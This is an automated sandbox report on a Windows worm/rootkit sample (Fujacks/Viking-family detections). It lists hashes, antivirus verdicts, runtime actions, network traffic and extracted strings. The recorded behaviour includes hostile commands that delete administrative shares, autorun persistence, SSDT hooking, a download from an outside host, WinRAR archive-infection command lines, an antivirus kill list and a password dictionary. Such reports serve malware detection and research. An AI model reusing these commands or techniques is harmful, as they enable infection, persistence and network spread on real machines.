Analysis Date2015-04-08 15:25:08
MD5fdc8a5660eed7c371980bac0c32f05d0
SHA1687d5e3134660468c6ad557464f12012c6901ef2

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.nsp0 md5: 32608f15bb53b440ddb449a4043106ff sha1: 5c3df26af5e917abfe2690813c1cbaccfcc824a5 size: 360448
Section.nsp1 md5: d613031d58fd2da5d1553f55b86171e3 sha1: d384e39f9cefd75ff0e9c2c545315a6c15540491 size: 77824
Section.nsp2 md5: 04d7b0e264aaed912ed69ddc02fd548b sha1: defdabfea6aaf7611b92f44998ae853b36a245cc size: 12800
Timestamp1992-06-19 22:22:17
PackerBorland Delphi v6.0 - v7.0
PEhashc3e21b43c3c5c3db09ebbe25b4f4f809d8c9b002
IMPhashc2045910afd28c799c236e97ee085dec
AV360 Safeno_virus
AVAd-AwareBackdoor.Hupigon.AYGZ
AVAlwil (avast)Rootkit-gen [Rtk]:Imponex [Wrm]
AVArcabit (arcavir)Backdoor.Hupigon.AYGZ:Rootkit.Agent.AIZZ
AVAuthentiumW32/Rootkit.LIUE-0684
AVAvira (antivir)Rkit/Small.AN
AVBullGuardBackdoor.Hupigon.AYGZ
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Rootkit.Small.ef.n3
AVClamAVWin.Trojan.Rootkit-4869
AVDr. WebWin32.HLLP.Whboy.99 - infected, incurable
AVEmsisoftBackdoor.Hupigon.AYGZ
AVEset (nod32)Win32/Fujacks virus
AVFortinetW32/Agent.LF!worm.p2p
AVFrisk (f-prot)W32/Rootkit.CKZ
AVF-SecureBackdoor.Hupigon.AYGZ
AVGrisoft (avg)PSW.Generic8.BBX.dropper
AVIkarusRootkit.Win32.Small
AVK7Trojan ( 003bc76d1 )
AVKaspersky 2015Trojan.Win32.Generic
AVMalwareBytesPacked.NSPack
AVMcafeeW32/Fujacks.az
AVMicrosoft Security EssentialsVirus:Win32/Viking.gen!B
AVMicroWorld (escan)Backdoor.Hupigon.AYGZ
AVRisingWin32.BMW.n
AVSophosno_virus
AVSymantecSuspicious.DLoader
AVTrend Microno_virus
AVVirusBlokAda (vba32)BScope.Rootkit.Gamepass.01309

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\WINDOWS\system32\drivers\TXPlatform.exe
Creates ProcessC:\WINDOWS\system32\drivers\TXPlatform.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del60$$.bat

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝
3
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates MutexShell.CMruPidlList

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del2$$.bat

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝
4
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝
3
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝
4
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex_SHuassist.mtx
Creates MutexShell.CMruPidlList
Winsock DNSwww.52cps.com

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del82$$.bat

Process
↳ cmd.exe /c net share C$ /del /y

Creates Processnet share C$ /del /y

Process
↳ cmd.exe /c net share E$ /del /y

Process
↳ cmd.exe /c net share admin$ /del /y

Creates Processnet share admin$ /del /y

Process
↳ cmd.exe /c net share admin$ /del /y

Creates Processnet share admin$ /del /y

Process
↳ cmd.exe /c net share E$ /del /y

Creates Processnet share E$ /del /y

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝
3
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex_SHuassist.mtx
Creates MutexShell.CMruPidlList

Process
↳ cmd.exe /c net share C$ /del /y

Creates Processnet share C$ /del /y

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\del82$$.bat

Process
↳ C:\WINDOWS\system32\drivers\TXPlatform.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Explorer ➝
C:\WINDOWS\system32\drivers\TXPlatform.exe\\x00
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CLASSES_ROOT\HTTP\shell\open\command\ ➝
"C:\Program Files\InternetExplorer\iexplore.exe" -nohome
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun ➝
128
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\myUPdatetxt.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\90$$.Ico
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\73$$.Ico
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\CMap\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\LanguageNames\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Desktop_1.ini
Creates FileC:\temp\run\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Help\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\Desktop_1.ini
Creates FileC:\autorun.inf
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\del2$$.bat
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\VDKHome\Desktop_1.ini
Creates FileC:\autorun.inf
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Font\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins3d\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Optional\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\7.0.0\en_US\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\SPPlugins\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Messages\ENU\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Howto\images\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Stamps\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Font\PFM\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\80$$.Ico
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\Images\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Multimedia\MPP\Desktop_1.ini
Creates FileC:\\\xa1\\xa1\\xa1\\xa1\\xa1\\xa1.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Browser\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Templates\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\ImageViewer\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Howto\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Locale\ENU\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\del60$$.bat
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates FileC:\Program Files\Adobe\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\AcroForm\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Locale\Desktop_1.ini
Creates FileC:\Program Files\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\ImageViewer\en_US\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Providers\Proximity\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Multimedia\Desktop_1.ini
Creates FileC:\\\xa1\\xa1\\xa1\\xa1\\xa1\\xa1.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Messages\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\del82$$.bat
Creates Filec:\QQ.sys
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\19$$.Ico
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Help\ENU\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\AcroForm\PMP\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Javascripts\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Esl\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\WebSearch\Desktop_1.ini
Creates FileC:\temp\logs\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Providers\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\VDKHome\ENU\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\7.0.0\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Stamps\ENU\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\Desktop_1.ini
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\59$$.Ico
Creates FileC:\temp\Desktop_1.ini
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Desktop_1.ini
Deletes Filec:\QQ.sys
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\19$$.Ico
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\90$$.Ico
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\73$$.Ico
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\59$$.Ico
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\80$$.Ico
Creates Processcmd.exe /c net share admin$ /del /y
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\del2$$.bat
Creates Processcmd.exe /c net share E$ /del /y
Creates Processcmd.exe /c net share C$ /del /y
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\del82$$.bat
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\del82$$.bat
Creates Processcmd.exe /c net share admin$ /del /y
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\html>\\n
Creates Processcmd.exe /c net share E$ /del /y
Creates Processcmd.exe /c net share C$ /del /y
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\del60$$.bat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates ServiceRESSDT - c:\QQ.sys
Winsock URL<html>\\n <head>\\n <title>404 Not Found</title>\\n </head>\\n <body>\\n <h1>Not Found</h1>\\n <p>Your browser sent a request that this server could not understand.</p>\\n <p>No such file or directory.</p>\\n <hr />\\n <address>Microsoft-IIS/7.0</address>\\n </body>\\n</html>\\n
Winsock URLhttp://www.52CPS.COM/goto/down.txt

Process
↳ net share C$ /del /y

Process
↳ net share admin$ /del /y

Creates Processnet1 share admin$ /del /y

Process
↳ net share admin$ /del /y

Creates Processnet1 share admin$ /del /y

Process
↳ net share E$ /del /y

Creates Processnet1 share E$ /del /y

Process
↳ net share C$ /del /y

Creates Processnet1 share C$ /del /y

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 808

Process
↳ Pid 856

Process
↳ Pid 1024

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Process
↳ Pid 1864

Process
↳ Pid 1136

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\html>\\n

Process
↳ net1 share admin$ /del /y

Process
↳ net1 share admin$ /del /y

Creates FilePIPE\srvsvc

Process
↳ net1 share E$ /del /y

Creates FilePIPE\srvsvc

Process
↳ net1 share C$ /del /y

Creates FilePIPE\srvsvc

Network Details:

DNSwww.52cps.com
Type: A
141.8.225.80
HTTP GEThttp://www.52CPS.COM/goto/down.txt
User-Agent: ErrCode
Flows TCP192.168.1.1:1040 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f676f74 6f2f646f 776e2e74   GET /goto/down.t
0x00000010 (00016)   78742048 5454502f 312e310d 0a557365   xt HTTP/1.1..Use
0x00000020 (00032)   722d4167 656e743a 20457272 436f6465   r-Agent: ErrCode
0x00000030 (00048)   0d0a486f 73743a20 7777772e 35324350   ..Host: www.52CP
0x00000040 (00064)   532e434f 4d0d0a43 61636865 2d436f6e   S.COM..Cache-Con
0x00000050 (00080)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000060 (00096)   0d0a                                  ..


Strings
.-
\
-
 
 
 
@
.
.,..
`
.
.
.
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
A call to an OS function failed
Access violation
Application Error1Format '%s' invalid or incompatible with argument
April
Assertion failed
August	September
Bitmap image is not valid
Cannot assign a %s to a %s%List does not allow duplicates ($0%x)%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Canvas does not allow drawing Clipboard does not support Icons
Control-C hit
December
Division by zero
DVCLAL
$Error creating variant or safe array)Variant or safe array index out of bounds
Exception in safecall method
External exception %x
February
File access denied
File not found
Floating point division by zero
Floating point overflow
Floating point underflow
Friday
Icon image is not valid!Cannot change the size of an icon
Integer overflow Invalid floating point operation
Interface not supported
Invalid argument
Invalid argument to date encode
Invalid argument to time encode
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid filename
Invalid numeric input
Invalid pointer operation
Invalid property value List capacity out of bounds (%d)
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant type
Invalid variant type conversion
I/O error %d
January
jjjj
July
June
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
MAINICON
March
Monday
No argument for format '%s'"Variant method calls not supported
November
October
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Operation not supported
Out of memory
Out of system resources
PACKAGEINFO
Privileged instruction(Exception %s in module %s at %p.
Range check error
Read
Read beyond end of file	Disk full
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Saturday
%s%s
%s.Seek not implemented$Operation not allowed on sorted list
%s (%s, line %d)
Stack overflow
Stream read error
Stream write error
Sunday
System Error.  Code: %d.
Thursday
Too many open files
Tuesday	Wednesday
Unexpected variant error
Variant or safe array is locked
Variant overflow
Write
                                                                
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
000000
0123456789ABCDEF
}_?0iE
111111
11111111
121212
123123
123456
1234567
12345678
123456789
1234qwer
123abc
123asd
123qwe
.14=uU
1B$lje
1Kill_Unit
@1.M$7
1PE_Infect
27hve.Z`
; ;&;,;2;8;>;D;J;P;V;\;b;h;
360safebox.exe
360Safe.exe
360tray.exe
3Messages
/4;2})a
4sSm-jPw
"4<]Y^R
5201314
\5;22jF
5,595Z5y5
6*$,0=
654321
;$]]`7"
7EUPd-
&7"	,Q
"#7Xq8]
88888888
8>J=vbFN
8ngtejd&wub;&ourt=.)spv(15BVW)BII(fiph.ki)Iri%!qmcun97!nanfnp:188(h`vflc:
901100
-96L=Z
@@9A	@J
*9_gOS
9l$\w_
)A2Yo:
 ,a6rZ[x
abc123
admin$
admin123
administrator
Administrator
advapi32.dll
ADVAPI32.DLL
*aj_Rp
ANSI_CHARSET
AnsiString To UnicodeString Error!
Apartment
ARABIC_CHARSET
Array 
aR._t[T-
Assertion failure
[AutoRun]
:\autorun.inf
_"B2S@
+B9gP<Z2
BALTIC_CHARSET
baseball
$$.bat
Boolean
BQ;4lE@
BQcwm~'Z
ByRef 
CaptureNet
ccEvtMgr
ccProxy
C ;C$s
ccSetMgr
ChangeServiceConfig2A
ChangeServiceConfig2W
CharNextA
CharToOemA
CharUpperBuffA
CHINESEBIG5_CHARSET
cl3DDkShadow
cl3DLight
clActiveBorder
clActiveCaption
clAppWorkSpace
clAqua
Classes
^Classes
clBackground
clBlack
clBlue
clBtnFace
clBtnHighlight
clBtnShadow
clBtnText
clCaptionText
clCream
clDefault
clFuchsia
clGradientActiveCaption
clGradientInactiveCaption
clGray
clGrayText
clGreen
clHighlight
clHighlightText
clHotLight
clInactiveBorder
clInactiveCaption
clInactiveCaptionText
clInfoBk
clInfoText
clLime
clMaroon
clMedGray
clMenu
clMenuBar
clMenuHighlight
clMenuText
clMoneyGreen
clNavy
clNone
clOlive
CloseHandle
CloseServiceHandle
closesocket
clPurple
clScrollBar
CLSIDFromProgID
clSilver
clSkyBlue
clTeal
clWhite
clWindow
clWindowFrame
clWindowText
clYellow
cmd.exe /c net share 
cmd.exe /c net share admin$ /del /y
c:\MyRARwork
CoAddRefServerProcess
CoCreateInstance
CoCreateInstanceEx
CoInitialize
CoInitializeEx
Common Files
ComnView
CompareStringA
ComPlus Applications
computer
connect
Consts
ControlService
Cool_GameSetup.exe
CopyFileA
CoReleaseServerProcess
CoResumeClassObjects
CoSuspendClassObjects
CoUninitialize
CPh@yC
C:\Program Files\Delphi7\Source\RTL\sys\SysUtils.pas
"C:\Program Files\InternetExplorer\iexplore.exe" -nohome
C:\Program Files\WinRAR\myrar.txt
C:\Program Files\WinRAR\winrar.exe
"C:\Program Files\WinRAR\winrar.exe" u -as -ep1 -inul -ibck "
"C:\Program Files\WinRAR\winrar.exe" x -inul -ibck -p- "
c:\QQ.sys
CreateBitmap
CreateBrushIndirect
CreateCompatibleBitmap
CreateCompatibleDC
CreateDIBitmap
CreateDirectoryA
CreateEventA
CreateFileA
CreateFontIndirectA
CreateIcon
CreatePalette
CreatePenIndirect
CreateServiceA
CreateThread
CreateToolhelp32Snapshot
Currency
CVariants
cxzccccccccccccccccccccccccccccccccc
C(_^[Y]
database
DbgPrint
Decimal
Default
DEFAULT_CHARSET
del %0
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
DeleteService
$ /del /y
Desktop_1.ini
DestroyIcon
.)D$H)
Dispatch
DispatchMessageA
Documents and Settings
\Documents and Settings\All Users\
\Documents and Settings\All Users\Start Menu\Programs\Startup\
DosDateTimeToFileTime
Double
DrawIconEx
drivers\
d{,RU}
Dsniff
D$t+D$\
D$t#D$h
dwPointerRva: %.8X = dwKSDT!
EAbstractError
EAccessViolation
EAssertionFailed
EASTEUROPE_CHARSET
	EControlC
EConvertError
EDivByZero
	EExternal
EExternalException
EFCreateError
EFilerError(MA
EFileStreamError
EFOpenError
EHeapException
EInOutError0
	EIntError
EIntfCastError
EIntOverflow
EInvalidCast
EInvalidGraphic0
EInvalidGraphicOperation
EInvalidOp
EInvalidOperation
EInvalidPointer`
EListError
EMathError
EmLpFv\
enable
EnterCriticalSection
EnumCalendarInfoA
EnumWindows
	EOleError
EOleException
EOleSysError
EOSError
EOutOfMemory
EOutOfResources
	EOverflow
EPrivilege
ERangeError
EReadError
ErrCode
ESafecallException
EStackOverflow
EStreamError
EStringListError
EU3"[r
EUnderflow
e~U#[z=
EVariantArrayCreateError
EVariantArrayLockedError
EVariantBadIndexError
EVariantBadVarTypeError
EVariantDispatchError
EVariantError
EVariantInvalidArgError
EVariantInvalidOpError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantOverflowError
EVariantTypeCastError
EVariantUnexpectedErrorP
EWriteError
ExAllocatePool
ExAllocatePoolWithTag
	Exception 
ExCz7Si
ExFreePool
ExFreePoolWithTag
ExitProcess
Explorer
ExtractIconA
e>YqmkbkruX`~tiiv`t*`~a%
EZeroDivideT
FComObj
File Read Error!
FileTimeToDosDateTime
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
Find Ssdt Base Error!!!
FindWindowA
`'fI]q
FireSvc
fKill360_4
#fl<-.!
F,l|-5
FormatMessageA
;F'P|[
FPUMaskValue
FreeLibrary
FreeResource
f-'rE[uL
F'Rn`g
fuckyou
FunUnit
ganran
GB2312_CHARSET
gdi32.dll
GDI32.DLL
GetACP
GetBitmapBits
GetCommandLineA
GetCPInfo
GetCurrentPositionEx
GetCurrentThreadId
GetDateFormatA
GetDeviceCaps
GetDIBits
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetDriveTypeA
GetErrorInfo
GetFileAttributesA
Get File Info Error!.ExitProc!
Get File Memory Error!
GetFileSize
GetFileType
GetFullPathNameA
gethostbyname
gethostname
GetIconInfo
GetKeyboardType
GetLastError
GetLocaleInfoA
GetLocalTime
GetLongPathNameA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetObjectA
Get PE Load Memory Error!!!
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeExA
GetSysColor
GetSystemDirectoryA
GetSystemMetrics
GetSystemPaletteEntries
GetTempPathA
GetTextMetricsA
GetThreadLocale
GetTickCount
GetVersion
GetVersionExA
g=<g~r
g+lb`6
GLlzELN?
GlobalAlloc
GlobalFree
GlobalHandle
GlobalLock
GlobalReAlloc
GlobalUnlock
godblessyou
 goto try1
 goto try2
Graphics
+Graphics
GREEK_CHARSET
gw=Ug&
HANGEUL_CHARSET
harley
hDdk S
Heap32First
Heap32ListFirst
Heap32ListNext
Heap32Next
HEBREW_CHARSET
height
hIG(+Z
%hmVD9`M
HNavigate
|?h!pd
Ht Ht.
HTTP\shell\open\command
@\:hwTl
$$.Ico
ID"?7a
.idata
$	idH/z#,!
if exist "
ihavenopass
IInterface
ImageBase: 0x%.8X, KeServiceDescriptorTable: 0x%8X, SSDT BaseAddress: 0x%8X, SSDT Count: 0x%X
I)/~`&n
inet_addr
inet_ntoa
INFNAN
InitializeCriticalSection
InstallShield Installation Information
Integer
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
InternetCloseHandle
Internet Explorer
InternetExplorer.Application
InternetGetConnectedState
InternetOpenA
InternetOpenUrlA
InternetReadFile
"I}}q~
Is File No MZ Header!!!
Is File No PE Header!!!
IStringsAdapter
JA]>J9
jeUaD6
JfMgQA
jiamijiemi
jianceshaomiao
JOHAB_CHARSET
K30)96@
K3s)HA
kavsvc
K}%Ekhvqqcv
kernel32.dll
KERNEL32.DLL
KeServiceDescriptorTable
kHTROk
KillTimer
??KKwaQ
KPfwSvc
KPh@yC
kP;Yd.k
K`r.LF/
K[#V2$}
KWindows
Kw?k@w
~KxI[)
LeaveCriticalSection
letmein
L\Jkbn
LoadIconA
LoadLibraryA
LoadLibraryAGetProcAddressVirtualProtectVirtualAllocVirtualFreeExitProcessRegCloseKeySetROP2WNetAddConnection2ANetRemoteTODZwDuplicateObjectCoInitializeVariantCopyExtractIconAURLDownloadToFileAGetDCInternetOpenAhtons
LoadLibraryExA
LoadResource
LoadStringA
LocalAlloc
LocalFileTimeToFileTime
LocalFree
LockResource
LongWord
LOoU(K
lordsys
lstrcpynA
lstrlenA
lsuv>(.akhfjatxh`nbgpnnh*cnephsiqs/ekj.rmho)pnnh*syr
lsuv>(.qsp/36DQU*DNK+`nrk(eisi/r|s
lsuv>(.qsp/36DQU*DNK+SK(Lsl
MAC_CHARSET
Map %s Demo: %.8X!!!
Map %s Error!!!
McAfeeFramework
McShield
McTaskManager
m/d/yy
memcpy
MessageBoxA
Messenger
Microsoft Frontpage
MiniReg
MiniSniffer
>'m=K~
mmmm d, yyyy
:mm:ss
Module32First
Module32FirstW
Module32Next
Module32NextW
MoveToEx
Movie Maker
mpr.dll
MPR.DLL
MskService
MSN Gamin Zone
MS Sans Serif
MulDiv
MultiByteToWideChar
mustang
mW1&?5/
mypass
mypass123
mypc123
myUPdatetxt.txt
-=mz}<pK
navapsvc
netapi32.dll
NETAPI32.DLL
NetApiBufferFree
`NetBios
NetMeeting
NetRemoteTOD
NetScheduleJobAdd
NetShareEnum
Neutral
No.%d: Break...Now Ssdt %.8X
No.%d: Old: %.8X, New: %.8X
NPFMntor
 Ns^di
NTDETECT.COM
NTDLL.DLL
ntkrnlpa.exe
ntoskrnl.exe
OEM_CHARSET
;!o(HS),
ole32.dll
OLE32.DLL
oleaut32.dll
OLEAUT32.DLL
OleStr
\oNCam
Open File Info Error!
OpenProcess
OpenSCManagerA
OpenServiceA
Outlook Express
p71\%F5
passwd
password
patrick
